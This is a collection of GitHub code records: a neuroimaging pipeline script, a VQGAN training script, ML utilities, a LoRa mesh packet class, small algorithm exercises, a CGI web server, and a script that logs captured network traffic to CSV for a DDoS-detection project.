freesurfer\n\tFSDIR = '/ifs/loni/faculty/njahansh/nerds/FABRIZIO/ABCD/recomT1/fs71_4mb/'\n\t#BVHOME = 'brainvisa-4.5.0-mandriva'\n\tBVHOME = '/ifs/loni/faculty/njahansh/nerds/FABRIZIO/ENIGMA_SULCI53/brainvisa-5.0.3/'\n\tBV_VER = 5\n\tscriptDIR = os.path.join(BVDIR, 'BV_scripts')\nelse:\n\t# Main folders\n\tMAINDIR = '/usr/local/ENIGMA50/' #Scripts Folder\n\tBVDIR = '/usr/local/bv_dir' # Folder containing subjects processed with brainvisa\n\tFSDIR = '/usr/local/fs_sbj' # INPUTS, folder containing subjects processed with freesurfer\n\t#BVHOME = '/usr/local/brainvisa-5.0.2'\n\tBVHOME = '/usr/local/brainvisa-4.5' #os.path.join(os.environ['HOME'], 'brainvisa-5.0.2\n\tBV_VER = 4\n\tscriptDIR = os.path.join(BVDIR, 'BV_scripts')\n\n\ndef folder_creation(SUBJECT):\n\t# Main folders creation\n\tif not os.path.exists(BVDIR):\n\t\tos.makedirs(BVDIR)\n\tif not os.path.exists(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/registration')):\n\t\tos.makedirs(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/registration'))\n\tif not os.path.exists(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/default_analysis')):\n\t\tos.makedirs(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/default_analysis'))\n\tif not os.path.exists(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/default_analysis/segmentation')):\n\t\tos.makedirs(os.path.join(BVDIR, 'subjects', SUBJECT, 't1mri/default_acquisition/default_analysis/segmentation'))\n\tif not os.path.exists(scriptDIR):\n\t\tos.makedirs(scriptDIR)\n\t# Non sono sicuro sia corretto definire il database per ogni soggetto.\n\tDATABASE_PATH = BVDIR # os.path.join(os.path.dirname(os.path.realpath(__file__)), 'database')\n\tif not os.path.exists(DATABASE_PATH):\n\t\tcreate_database(DATABASE_PATH)\n\n\ndef create_database(DATABASE_PATH):\n\t#CREATE DATABASE\n\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/template_create_database.bvproc')\n\tfile_parsed_template_path = os.path.join(scriptDIR, 'create_database.bvproc')\n\tf_in = open(file_template_path, 'r')\n\tf_out = open(file_parsed_template_path, 'w')\n\n\tfor line in f_in:\n\t\t#read replace the string and write to output file\n\t\tline = line.replace('DATABASE_PATH', DATABASE_PATH)\n\t\tf_out.write(line)\n\t#close input and output files\n\tf_in.close()\n\tf_out.close()\n\n\t# the scriptDIR has to be the current working directory to run bvproc scripts\n\tos.chdir(scriptDIR)\n\tos.system(f'{BVHOME}/bin/bv axon-runprocess --enabledb {file_parsed_template_path}')\n\n\ndef convert_freesurfer_to_brainvisa(SUBJECT):\n\t#IMPORT FREESURFER\n\tif BV_VER == 4:\n\t\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/template_fs_import_4.5_ok.bvproc')\n\telse:\n\t\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/import_freesurfer_bv503.bvproc')\n\tfile_parsed_template_path = os.path.join(scriptDIR, f'{SUBJECT}_fs_import_ok.bvproc')\n\tf_in = open(file_template_path, 'r')\n\tf_out = open(file_parsed_template_path, 'w')\n\n\tfor line in f_in:\n\t\t#read replace the string and write to output file\n\t\tline = line.replace('BVDIR', BVDIR)\n\t\tline = line.replace('SUBJECT', SUBJECT)\n\t\tline = line.replace('subjid', SUBJECT)\n\t\tline = line.replace('FSDIR', FSDIR)\n\t\tline = line.replace('BVHOME', BVHOME)\t\n\t\tf_out.write(line)\n\t#close input and output files\n\tf_in.close()\n\tf_out.close()\n\n\t# the scriptDIR has to be the current working directory to run bvproc scripts\n\tos.chdir(scriptDIR)\n\t#os.system(f'{BVHOME}/bin/brainvisa -r {file_parsed_template_path} --enable-db')\n\tos.system(f'{BVHOME}/bin/bv axon-runprocess --enabledb {file_parsed_template_path}')\n\n\ndef run_morphologist(SUBJECT):\n\t#MORPHOLOGIST PIPELINE\n\tif BV_VER == 4:\n\t\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/template_T1_4.5_ok.bvproc')\n\telse:\n\t\tfile_template_path = os.path.join(MAINDIR, 'brainvisa_templates/template_morphologist_503.bvproc')\n\tfile_parsed_template_path = os.path.join(scriptDIR, f'{SUBJECT}_morphologist_503.bvproc')\n\tf_in = open(file_template_path, 'r')\n\tf_out = open(file_parsed_template_path, 'w')\n\n\tfor line in f_in:\n\t\t#read replace the string and write to output file\n\t\tline = line.replace('BVDIR', BVDIR)\n\t\tline = line.replace('SUBJECT', SUBJECT)\n\t\tline = line.replace('BVHOME', BVHOME)\t\n\t\tf_out.write(line)\n\t#close input and output files\n\tf_in.close()\n\tf_out.close()\n\n\t# the scriptDIR has to be the current working directory to run bvproc scripts\n\tos.chdir(scriptDIR)\n\tos.system(f'{BVHOME}/bin/bv axon-runprocess {file_parsed_template_path}')\n\ndef remove_lock(BVDIR,subj):\n\n\tsubj_dir= os.path.join(BVDIR, 'subjects',subj)\n\tfor root, dirs, files in os.walk(subj_dir):\n\t\tfor file in files:\n\t\t\tif (file.endswith(\".lock\")):\n\t\t\t\tprint(os.path.join(root, file))\n\t\t\t\tos.remove(os.path.join(root, file))\n\n\ndef main():\n\t#Settings\n\tparser = argparse.ArgumentParser(description='BrainVisa Cortical Surface pipeline')\n\tparser.add_argument('--subject', '-s', type=str, help=\"subject ID\")\n\tparser.add_argument('--list', '-l', action='store_true', help=\"folder with subjects\")\n\targs = parser.parse_args()\n\n\tif not (args.list or args.subject):\n\t\tparser.error('No action requested, add -list or -subject')\n\n\t\n\tif args.list:\n\t\tsubjects_path = os.path.join(BVDIR, 'subjects')\n\t\tsubjects = [f for f in os.listdir(subjects_path) if (os.path.isdir(os.path.join(subjects_path, f)))]\n\n\t\tfor sbj in subjects:\n\t\t\t# remove .lcok files\n\t\t\tremove_lock(BVDIR, sbj)\n\n\t\t\t#Brainvisa pipeline\n\t\t\tprint(f'*** {sbj} Morphologist pipeline started ***\\n')\n\t\t\tfolder_creation(sbj)\n\t\t\tconvert_freesurfer_to_brainvisa(sbj)\n\t\t\t#run_morphologist(sbj)\n\t\t\tprint(f'*** {sbj} Removing .lock files ***\\n')\n\t\t\t#remove .lcok files\n\t\t\tremove_lock(BVDIR, sbj)\n\telse:\n\t\tsbj = args.subject\n\t\t\n\t\t#Brainvisa pipeline\n\t\tprint(f'*** {sbj} Morphologist pipeline started ***\\n')\n\t\tfolder_creation(sbj)\n\t\tconvert_freesurfer_to_brainvisa(sbj)\n\t\trun_morphologist(sbj)\n\n\t\tprint(f'*** {sbj} Removing .lock files ***\\n')\n\t\t#remove .lcok files\n\t\tremove_lock(BVDIR, sbj)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"mirkozaff/sulcus-parameterization-pipeline","sub_path":"run_brainvisa_morphologist.py","file_name":"run_brainvisa_morphologist.py","file_ext":"py","file_size_in_byte":6417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17828527545","text":"import os\nfrom os.path import join as opj\nimport argparse \nimport datetime\nimport time\n\nimport numpy as np\nimport cv2\nimport torch\nimport torch.distributed as dist\nfrom torch.backends import cudnn\n\nfrom utils.util import *\nfrom datasets.dataloader import get_dataloader\nfrom models.VQGAN import VQGAN\ntorch.autograd.set_detect_anomaly(True)\n\ndef build_args(is_test=False):\n parser = argparse.ArgumentParser()\n\n #### dataset ####\n parser.add_argument(\"--data_root_dir\", type=str, default=\"/home/data\")\n parser.add_argument(\"--data_name\", type=str, default=\"CelebA-HQ-img\")\n parser.add_argument(\"--img_size_H\", type=int, default=256)\n parser.add_argument(\"--img_size_W\", type=int, default=256)\n parser.add_argument(\"--n_workers\", type=int, default=4)\n parser.add_argument(\"--in_ch\", type=int, default=3)\n\n #### model ####\n parser.add_argument(\"--ngf\", type=int, default=128)\n parser.add_argument(\"--ngf_mult\", default=[1,1,2,2,4])\n parser.add_argument(\"--resolution\", type=int, default=256)\n parser.add_argument(\"--attn_resolutions\", default=[16])\n parser.add_argument(\"--z_dim\", type=int, default=256)\n parser.add_argument(\"--n_embed\", type=int, default=1024)\n parser.add_argument(\"--embed_dim\", type=int, default=256)\n parser.add_argument(\"--beta\", type=float, default=0.25)\n parser.add_argument(\"--ndf\", type=int, default=64)\n parser.add_argument(\"--D_n_layers\", type=int, default=3)\n parser.add_argument(\"--num_res_blks\", type=int, default=2)\n parser.add_argument(\"--double_z\", type=bool, default=False)\n parser.add_argument(\"--D_use_actnorm\" ,type=bool, default=False)\n \n #### train & eval ####\n parser.add_argument(\"--n_iters\", type=int, default=50000000)\n parser.add_argument(\"--batch_size\", type=int, default=2)\n parser.add_argument(\"--val_batch_size\", type=int, default=128)\n parser.add_argument(\"--perceptual_weight\", type=float, default=1.0)\n parser.add_argument(\"--D_weight\", type=float, default=0.8)\n parser.add_argument(\"--D_thres_iter\", type=int, default=30001)\n parser.add_argument(\"--codebook_weight\", type=float, default=1.0)\n parser.add_argument(\"--G_lr\", type=float, default=4.5e-6)\n parser.add_argument(\"--D_lr\", type=float, default=4.5e-6)\n parser.add_argument(\"--betas\", default=(0.5, 0.9))\n parser.add_argument(\"--adv_loss_type\", type=str, default=\"hinge\")\n\n #### save & load ####\n parser.add_argument(\"--no_save\", type=bool, default=False)\n parser.add_argument(\"--save_root_dir\" ,type=str, default=\"/media/data1/jeonghokim/GANs/VQGAN\")\n parser.add_argument(\"--save_name\", type=str, default=\"\")\n parser.add_argument(\"--log_save_iter_freq\", type=int, default=200)\n parser.add_argument(\"--img_save_iter_freq\", type=int, default=5000)\n parser.add_argument(\"--model_save_iter_freq\", type=int, default=30000)\n parser.add_argument(\"--eval_iter_freq\", type=int, default=60000)\n #### config ####\n parser.add_argument(\"--use_DDP\", action=\"store_true\")\n\n args = parser.parse_args()\n args.save_name = f\"{datetime.datetime.now().strftime('%Y%m%d')}_\" + args.save_name\n args.is_test = is_test\n if is_test:\n args.use_DDP = False\n args.is_test = True\n args.no_save = True\n if args.use_DDP:\n args.local_rank = int(os.environ[\"LOCAL_RANK\"])\n torch.cuda.set_device(args.local_rank)\n dist.init_process_group(backend='nccl', timeout=datetime.timedelta(seconds=72000))\n args.n_gpus = dist.get_world_size()\n else:\n args.local_rank = 0\n args.n_gpus = 1\n args.save_dir = opj(args.save_root_dir, args.save_name)\n args.img_save_dir = opj(args.save_dir, \"save_images\")\n args.model_save_dir = opj(args.save_dir, \"save_models\")\n args.eval_save_dir = opj(args.save_dir, \"eval_save_images\")\n args.log_path = opj(args.save_dir, \"log.txt\")\n args.config_path = opj(args.save_dir, \"config.json\") \n if not args.no_save:\n os.makedirs(args.img_save_dir, exist_ok=True)\n os.makedirs(args.model_save_dir, exist_ok=True)\n os.makedirs(args.eval_save_dir, exist_ok=True)\n return args\ndef main_worker(args, logger):\n train_loader, valid_loader = get_dataloader(args)\n logger.write(f\"[Train] # of imgs : {len(train_loader.dataset)}\")\n logger.write(f\"1 epochs : {len(train_loader)} iters\")\n if args.local_rank == 0:\n save_args(args, args.config_path)\n model = VQGAN(args)\n model.print_n_params(logger)\n cur_iter = 1\n start_time = time.time()\n break_flag = False\n for epoch in range(1, 100000):\n loss_G_meter = AverageMeter()\n loss_D_meter = AverageMeter()\n for img in train_loader:\n img = img.cuda(args.local_rank)\n model.set_input(real_img=img)\n model.train(cur_iter)\n\n BS = img.shape[0]\n loss_G_meter.update(model.G_loss_val*2, BS)\n loss_D_meter.update(model.D_loss_val*2, BS)\n if cur_iter % args.log_save_iter_freq == 0:\n elapsed_time = str(datetime.timedelta(seconds=time.time() - start_time))[:-7]\n msg = f\"[Train]_[Elapsed time - {elapsed_time}]_[iter - {cur_iter}/{args.n_iters}]_[Epoch - {epoch}]_[D/loss - {model.D_loss_val:.4f}]_[G/loss - {model.G_loss_val:.4f}]_[D/loss avg - {loss_D_meter.avg:.4f}]_[G/loss avg - {loss_G_meter.avg:.4f}]\"\n logger.write(msg)\n if cur_iter % args.model_save_iter_freq == 0:\n to_path = opj(args.model_save_dir, f\"{cur_iter}_{args.n_iters}.pth\")\n model.save(to_path)\n if cur_iter % args.img_save_iter_freq == 0:\n real_img_img = tensor2img(model.real_img)\n gene_img_img = tensor2img(model.recon_img)\n save_img = np.concatenate([real_img_img, gene_img_img], axis=1)\n to_path = opj(args.img_save_dir, f\"{cur_iter}_{args.n_iters}.png\")\n if args.local_rank == 0:\n cv2.imwrite(to_path, save_img[:,:,::-1])\n if cur_iter == args.n_iters:\n break_flag = True\n break\n if args.use_DDP:\n dist.barrier()\n cur_iter += 1\n\n if break_flag: \n break\nif __name__ == \"__main__\":\n args = build_args()\n logger = Logger(args.local_rank, no_save=args.no_save)\n logger.open(args.log_path)\n print_args(args, logger)\n cudnn.benchmark = True\n main_worker(args, logger)\n ","repo_name":"rlawjdghek/Generative_Models","sub_path":"GANs/VQ-GAN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12076261135","text":"import os\nimport sys\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom src.logger import logging\nfrom src.exception import CustomException\nfrom sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error\n\ndef save_object(obj_file_path, obj):\n try:\n dir_path = os.path.dirname(obj_file_path)\n\n os.makedirs(dir_path, exist_ok=True)\n\n with open(obj_file_path, 'wb') as file_obj:\n pickle.dump(obj, file_obj)\n\n except Exception as e:\n raise CustomException(e, sys)\n \n\ndef evaluate_models(X_train, y_train, X_test, y_test, models):\n logging.info('Evaluating all models passed .. ')\n try:\n report = {}\n max_test_score = 0\n best_model_name = None\n\n for model in models.keys():\n\n curr_model = models[model]\n curr_model.fit(X_train, y_train)\n\n y_test_pred = curr_model.predict(X_test)\n test_model_score = r2_score(y_test, y_test_pred)\n\n if (test_model_score > max_test_score):\n max_test_score = test_model_score\n best_model_name = model\n\n report[model] = test_model_score\n \n return (\n report,\n max_test_score,\n best_model_name\n )\n\n except Exception as e:\n logging.error('Something went wrong while evaluating the model')\n raise CustomException(e, sys)\n\n\ndef load_object(obj_file_path):\n try:\n with open(obj_file_path, 'rb') as file_obj:\n return pickle.load(file_obj)\n except Exception as e:\n logging.error('Something went wrong while loading pickle file')\n raise CustomException(e, sys)","repo_name":"myGreatLoveM/ml_project_regressor","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43146054352","text":"import struct\nimport hashlib\nimport binascii\ntry:\n from ujson import loads, dumps\nexcept:\n from json import loads, dumps\n\nclass Packet:\n\n HEADER_SIZE_P2P = 20\n HEADER_FORMAT_P2P = \"!8s8sB3s\" #Source, Destination, Flags, Check Sum\n HEADER_SIZE_MESH = 22\n HEADER_FORMAT_MESH = \"!8s8sB2s3s\" #Source, Destination, Flags, ID, Check Sum\n\n OK = \"OK\"\n METADATA = \"METADATA\" #\"request-data-info\"\n CHUNK = \"CHUNK\" #\"chunk-\"\n DATA = \"DATA\"\n COMMAND = {DATA: \"00\", OK: \"01\", CHUNK: \"10\", METADATA: \"11\"}\n COMMAND_BITS = {\"00\": DATA, \"01\": OK, \"10\": CHUNK, \"11\": METADATA}\n\n @staticmethod\n def check_command(command: str) -> bool:\n if command in Packet.COMMAND:\n return True\n return False\n\n def __init__(self, mesh_mode):\n self.mesh_mode = mesh_mode\n\n if not self.mesh_mode:\n self.HEADER_SIZE = self.HEADER_SIZE_P2P\n self.HEADER_FORMAT = self.HEADER_FORMAT_P2P\n else:\n self.HEADER_SIZE = self.HEADER_SIZE_MESH\n self.HEADER_FORMAT = self.HEADER_FORMAT_MESH\n\n self.source = '' # 8 Bytes mac address of the source\n self.destination = '' # 8 Bytes mac address of the destination\n\n self.checksum = None # Checksum\n self.payload = b'' # Content of the message\n\n self.check = None # True if checksum is correct with content\n\n ## Flags:\n self.command = None # Type of command / or Data bit: 0, 1\n # Only for mesh mode\n self.mesh = False # Mesh On or Off for this Node bit: 3\n self.sleep = True # True if should sleep before forwarding message bit: 4\n self.hop = False # If packet was forwarder -> 1, else -> 0 bit: 5\n self.debug_hops = False # Overrides payload to get path details (hops) bit: 6\n # Change settings\n self.change_sf = False # If True, check payload to change SF bit: 7\n\n # For mesh\n self.id = None # Random number from 0 to 65.535\n\n def set_source(self, source: str):\n self.source = source\n\n def get_source(self):\n return self.source\n\n def set_destination(self, destination: str):\n self.destination = destination\n\n def get_destination(self):\n return self.destination\n\n def get_command(self):\n return self.command\n\n def set_ok(self):\n self.command = \"OK\"\n\n def ask_metadata(self):\n self.command = \"METADATA\"\n\n def set_metadata(self, length, name):\n self.command = \"METADATA\"\n metadata = {\"LENGTH\" : length, \"FILENAME\": name}\n self.payload = dumps(metadata).encode()\n\n def get_payload(self):\n return self.payload\n\n def get_metadata(self):\n if self.command == \"METADATA\":\n try:\n return loads(self.payload)\n except:\n return None\n\n def ask_data(self, next_chunk):\n self.command = \"CHUNK\"\n self.payload = str(next_chunk).encode()\n\n def set_data(self, chunk):\n self.command = \"DATA\"\n self.payload = chunk\n\n def get_mesh(self):\n return self.mesh\n\n def enable_mesh(self):\n self.mesh = True\n\n def disable_mesh(self):\n self.mesh = False\n\n def enable_hop(self):\n self.hop = True\n\n def get_hop(self):\n return self.hop\n\n def get_debug_hops(self):\n return self.debug_hops\n\n def enable_debug_hops(self):\n self.debug_hops = True\n\n def disable_debug_hops(self):\n self.debug_hops = False\n\n def enable_sleep(self):\n self.sleep = True\n\n def disable_sleep(self):\n self.sleep = False\n\n def get_sleep(self):\n return self.sleep\n\n def get_change_sf(self):\n return self.change_sf\n\n def set_change_sf(self, sf):\n self.set_ok()\n self.change_sf = True\n self.payload = dumps(sf).encode()\n\n def get_message_path(self):\n if self.debug_hops:\n try:\n return loads(self.payload)\n except:\n return None\n\n def add_hop(self, name, rssi, time_sleep):\n hop = (name, rssi, time_sleep)\n path = self.get_message_path()\n if isinstance(path, list):\n path.append(hop)\n else:\n path = [hop]\n self.enable_debug_hops()\n self.payload = dumps(path).encode()\n\n def add_previous_hops(self, path):\n if isinstance(path, list):\n self.payload = dumps(path).encode()\n\n def set_id(self, id):\n if id <= 65535:\n self.id = id\n\n def get_id(self):\n return self.id\n\n def get_length(self):\n if len(self.payload) > 0:\n return self.HEADER_SIZE + len(self.payload)\n else:\n return self.HEADER_SIZE\n\n def get_checksum(self, data):\n h = hashlib.sha256(data)\n ha = binascii.hexlify(h.digest())\n return (ha[-3:])\n\n def get_content(self):\n if self.command in self.COMMAND:\n command_bits = self.COMMAND[self.command]\n\n flags = 0\n if command_bits[0] == \"1\":\n flags = flags | (1<<0)\n if command_bits[1] == \"1\":\n flags = flags | (1<<1)\n if self.mesh:\n flags = flags | (1<<3)\n if self.sleep:\n flags = flags | (1<<4)\n if self.hop:\n flags = flags | (1<<5)\n if self.debug_hops:\n flags = flags | (1<<6)\n if self.change_sf:\n flags = flags | (1<<7)\n\n p = self.payload\n self.checksum = self.get_checksum(p)\n\n if self.mesh_mode:\n try:\n id_bytes = self.id.to_bytes(2, 'little')\n except:\n print(self.source.encode(), self.destination.encode(), flags, self.id, self.checksum)\n #print(self.source, self.destination, flags, id_bytes, self.checksum, p)\n h = struct.pack(self.HEADER_FORMAT, self.source.encode(), self.destination.encode(), flags, id_bytes, self.checksum)\n else:\n #print(self.source, self.destination, flags, self.checksum, p)\n h = struct.pack(self.HEADER_FORMAT, self.source.encode(), self.destination.encode(), flags, self.checksum)\n\n return h+p\n\n def parse_flags(self, flags: int):\n c0 = \"1\" if (flags >> 0) & 1 == 1 else \"0\"\n c1 = \"1\" if (flags >> 1) & 1 == 1 else \"0\"\n self.command = self.COMMAND_BITS[c0+c1]\n\n self.mesh = (flags >> 3) & 1 == 1\n self.sleep = (flags >> 4) & 1 == 1\n self.hop = (flags >> 5) & 1 == 1\n self.debug_hops = (flags >> 6) & 1 == 1\n self.change_sf = (flags >> 7) & 1 == 1\n\n def load(self, packet):\n header = packet[:self.HEADER_SIZE]\n content = packet[self.HEADER_SIZE:]\n\n if self.mesh_mode:\n self.source, self.destination, flags, id, self.checksum = struct.unpack(self.HEADER_FORMAT, header)\n self.id = int.from_bytes(id, \"little\")\n else:\n self.source, self.destination, flags, self.checksum = struct.unpack(self.HEADER_FORMAT, header)\n\n self.source = self.source.decode()\n self.destination = self.destination.decode()\n\n self.parse_flags(flags)\n\n self.payload = content\n\n self.check = self.checksum == self.get_checksum(self.payload)\n return self.check\n\n def get_dict(self):\n p = self.payload\n self.checksum = self.get_checksum(p)\n d = {\"source\" : self.source,\n \"destination\" : self.destination,\n \"command\" : self.command,\n \"checksum\" : self.checksum.decode(),\n \"payload\" : self.payload.decode(),\n \"mesh\" : self.mesh,\n \"hop\" : self.hop,\n \"sleep\" : self.sleep,\n \"debug_hops\" : self.debug_hops,\n \"change_sf\" : self.change_sf,\n \"id\" :self.id,\n }\n return d\n\n def load_dict(self, d):\n self.source = d[\"source\"]\n self.destination = d[\"destination\"]\n self.command = d[\"command\"]\n self.checksum = d[\"checksum\"].encode()\n self.payload = d[\"payload\"].encode()\n self.mesh = d[\"mesh\"]\n self.hop = d[\"hop\"]\n self.sleep = d[\"sleep\"]\n self.debug_hops = d[\"debug_hops\"]\n self.change_sf = d[\"change_sf\"]\n self.id = d[\"id\"]\n\n self.check = self.checksum == self.get_checksum(self.payload)\n return self.check\n\nif __name__ == \"__main__\":\n mac_address_A = \"70b3d5499a76ba3f\"[8:]\n mac_address_B = \"70b3d54993a5bb9c\"[8:]\n\n mesh_mode = True\n\n content = b\"TEST...\"\n\n s_addr = mac_address_A\n d_addr = mac_address_B\n\n print(\"P1: \")\n p = Packet(mesh_mode)\n p.set_source(s_addr)\n p.set_destination(d_addr)\n\n if mesh_mode:\n id = 555\n #p.set_retransmission(2)\n p.enable_mesh()\n p.enable_hop()\n p.set_id(id)\n\n #p.ask_data(1500)\n #p.set_data(content)\n p.set_metadata(5, \"test\")\n packet = p.get_content()\n print(\"Packet: {}\".format(packet))\n print(p.get_payload())\n\n print(\"\\nP2: \")\n p2 = Packet(mesh_mode)\n successfull = p2.load(packet)\n packet2 = p2.get_content()\n print(\"Packet loaded: {}\".format(packet2))\n print(p2.get_payload())\n js = p2.get_dict()\n print(js)\n\n print(\"\\nP3: \")\n p3 = Packet(mesh_mode)\n success = p3.load_dict(js)\n print(success)\n packet = p3.get_content()\n print(\"Packet: {}\".format(packet))\n #print(p3.get_payload())\n metadata = p3.get_metadata()\n length = metadata[\"LENGTH\"]\n filename = metadata[\"FILENAME\"]\n print(length, filename)\n\n print(Packet.check_command(\"OK\"))\n print(Packet.check_command(\"METADATA\"))\n print(Packet.check_command(\"DATA\"))\n print(Packet.check_command(\"CHUNK\"))\n print(Packet.check_command(\"Other\"))\n","repo_name":"SMARTLAGOON/AlLoRa","sub_path":"AlLoRa/Packet.py","file_name":"Packet.py","file_ext":"py","file_size_in_byte":10148,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"2148829593","text":"#flow_duration, ip_proto, src_port, dstport, byte_count, packet_count, label\n\nimport csv\nimport subprocess\nfrom Collect_ddos_attack import CollectTrainingStatsApp\n\n\n\ndef attack_generation():\n # Step 4: Generate DDoS attack and save data\n #CollectTrainingStatsApp()\n # Assuming the attack traffic has been generated and captured by ITGRecv\n capture_file = 'capture.txt'\n with open(capture_file, 'w') as f:\n subprocess.call([\"./ITGRecv\"], stdout=f) # Run ITGRecv and capture output to file\n\n # Read the captured traffic data from the ITGRecv output file\n captured_data = []\n with open(capture_file, 'r') as f:\n for line in f:\n # Extract the required fields from each line and add them to the captured_data list\n fields = line.strip().split(',') # Adjust the splitting logic based on the actual output format\n timestamp = fields[0]\n datapath_id = fields[1]\n flow_id = fields[2]\n ip_src = fields[3]\n tp_src = fields[4]\n ip_dst = fields[5]\n tp_dst = fields[6]\n ip_proto = fields[7]\n icmp_code = fields[8]\n icmp_type = fields[9]\n flow_duration_sec = fields[10]\n flow_duration_nsec = fields[11]\n idle_timeout = fields[12]\n hard_timeout = fields[13]\n flags = fields[14]\n packet_count = fields[15]\n byte_count = fields[16]\n packet_count_per_second = fields[17]\n packet_count_per_nsecond = fields[18]\n byte_count_per_second = fields[19]\n byte_count_per_nsecond = fields[20]\n label = fields[21]\n\n captured_data.append({\n 'timestamp': timestamp,\n 'datapath_id': datapath_id,\n 'flow_id': flow_id,\n 'ip_src': ip_src,\n 'tp_src': tp_src,\n 'ip_dst': ip_dst,\n 'tp_dst': tp_dst,\n 'ip_proto': ip_proto,\n 'icmp_code': icmp_code,\n 'icmp_type': icmp_type,\n 'flow_duration_sec': flow_duration_sec,\n 'flow_duration_nsec': flow_duration_nsec,\n 'idle_timeout': idle_timeout,\n 'hard_timeout': hard_timeout,\n 'flags': flags,\n 'packet_count': packet_count,\n 'byte_count': byte_count,\n 'packet_count_per_second': packet_count_per_second,\n 'packet_count_per_nsecond': packet_count_per_nsecond,\n 'byte_count_per_second': byte_count_per_second,\n 'byte_count_per_nsecond': byte_count_per_nsecond,\n 'label': label\n })\n\n # Save the captured data to a CSV file\n csv_file = 'captured_data.csv'\n fieldnames = ['timestamp', 'datapath_id', 'flow_id', 'ip_src', 'tp_src', 'ip_dst', 'tp_dst',\n 'ip_proto', 'icmp_code', 'icmp_type', 'flow_duration_sec', 'flow_duration_nsec',\n 'idle_timeout', 'hard_timeout', 'flags', 'packet_count', 'byte_count',\n 'packet_count_per_second', 'packet_count_per_nsecond', 'byte_count_per_second',\n 'byte_count_per_nsecond', 'label']\n\n with open(csv_file, 'w', newline='') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(captured_data)\n","repo_name":"Viswanath-621/Preventing-Network-Attacks-An-Integrated-Approach-using-Linear-SVM-and-SDN-Environment","sub_path":"Python files/AttackGeneration.py","file_name":"AttackGeneration.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32221351027","text":"'''\nВеб сервер\nВ текущем каталоге должны быть подкаталоги\ncgi-bin и ntbin\n'''\nimport os, sys\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\n\nwebdir = '.' # Файлы html и подкаталог cgi-bin\nport = 80 # Порт\n\nos.chdir(webdir) # перейти в каталог HTML\nsrvaddr = ('', port) # имя хоста и порт\nsrvrobj = HTTPServer(srvaddr, CGIHTTPRequestHandler)\nsrvrobj.serve_forever() # Запустить как бесконечный фоновый процесс \n","repo_name":"st0ll1/book","sub_path":"db/web_interface/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33227975932","text":"# Given\n# an\n# array\n# A\n# of\n# non - negative\n# integers, half\n# of\n# the\n# integers in A\n# are\n# odd, and half\n# of\n# the\n# integers\n# are\n# even.\n#\n# Sort\n# the\n# array\n# so\n# that\n# whenever\n# A[i] is odd, i is odd; and whenever\n# A[i] is even, i is even.\n#\n# You\n# may\n# return any\n# answer\n# array\n# that\n# satisfies\n# this\n# condition.\n#\n# Example\n# 1:\n#\n# Input: [4, 2, 5, 7]\n# Output: [4, 5, 2, 7]\n# Explanation: [4, 7, 2, 5], [2, 5, 4, 7], [2, 7, 4, 5]\n# would\n# also\n# have\n# been\n# accepted.\n\ndef sort_even_odd_based_on_array_index(arr):\n result = [0 for num in arr]\n even_index = 0\n odd_index = 1\n for num in arr:\n if num%2 == 0:\n result[even_index] = num\n even_index += 2\n else:\n result[odd_index] = num\n odd_index += 2\n print(result)\n\narr = [4, 2, 5, 7]\nsort_even_odd_based_on_array_index(arr)","repo_name":"avidekar/python-assignments","sub_path":"sort_even_odd_based_on_array_index.py","file_name":"sort_even_odd_based_on_array_index.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69811583185","text":"#coding=utf-8\n'''\n用两个栈来实现一个队列,完成队列的Push和Pop操作。 队列中的元素为int类型。\n'''\nclass Solution:\n def __init__(self):\n #two stack A,B\n #list.append() is push and list.pop() is pop\n self.a=[]\n self.b=[]\n def push(self, node):\n # write code here\n self.a.append(node)\n def pop(self):\n # return xx\n if len(self.a) == 0:\n return None\n while len(self.a):\n self.b.append(self.a.pop())\n out = self.b.pop()\n while len(self.b):\n self.a.append(self.b.pop())\n return out\n","repo_name":"lanpartis/jianzhiOffer_practice","sub_path":"5_two_stack_a_queue.py","file_name":"5_two_stack_a_queue.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74271449746","text":"from core.linked_list import LinkedList\nfrom core.node import Node\nfrom core.utils import numberize\n\n\nclass DataRow(LinkedList):\n\n def __init__(self, *args) -> None:\n super().__init__()\n for arg in args:\n arg = numberize(arg)\n if type(arg) == str:\n if \"\\\"\" in arg or \"\\'\" in arg:\n arg: str = arg.replace(\"'\", \"\").replace('\"', '').replace(\"\\\\\", \" \")\n else:\n continue\n self.append(arg)\n\n def __str__(self) -> str:\n result = super().__str__()\n return result.replace(\",\", \" |\").replace(\"[\", \"\").replace(\"]\", \"\")\n\n @property\n def root(self) -> Node:\n return self.head\n\n def str_justed_by(self, value) -> 